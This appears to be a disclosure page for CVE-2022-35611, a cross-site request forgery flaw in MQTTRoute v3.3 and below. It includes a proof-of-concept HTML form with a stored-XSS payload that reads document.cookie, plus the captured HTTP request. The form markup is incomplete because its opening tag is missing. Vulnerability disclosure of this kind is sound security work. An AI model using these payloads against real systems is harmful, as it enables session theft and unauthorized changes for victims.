Headline

CVE-2022-35611: CVE-ID: CVE-2022-35611

A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards.

2 years ago

#xss #csrf #web #windows #js #java #firefox

A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards.

The HTTP requests issued by the application do not have anti-csrf tokens. As a result, an attacker can craft a malicious form, which when submitted by an unsuspecting user in a valid session, would make the server assume that the request has been sent willingly by the user.

Sample PoC form to create a dashboard:

<html>

<body>

  <input type="hidden" name="name" value="SC&lt;img&#32;src&#61;&#35;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;" />

  <input type="hidden" name="desc" value="ADV" />

  <input type="submit" value="Submit request" />

</form>

</body>

</html>

An attacker can use CSRF to inject JavaScript as the dashboard name, granting the attacker access to the victim user’s cookie, since the cookie is not marked as HTTPONLY.

Upon submitting the above form, the following request is sent to the server. Note that the origin of the request is not http://localhost:8080, which proves that it is a CSRF request.

HTTP Request:

POST /bwiot/api/v1/dashboard/ HTTP/1.1

Host: localhost:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

DNT: 1

Connection: close

Cookie: admin=177a54415aa44802851dcc4c04138c02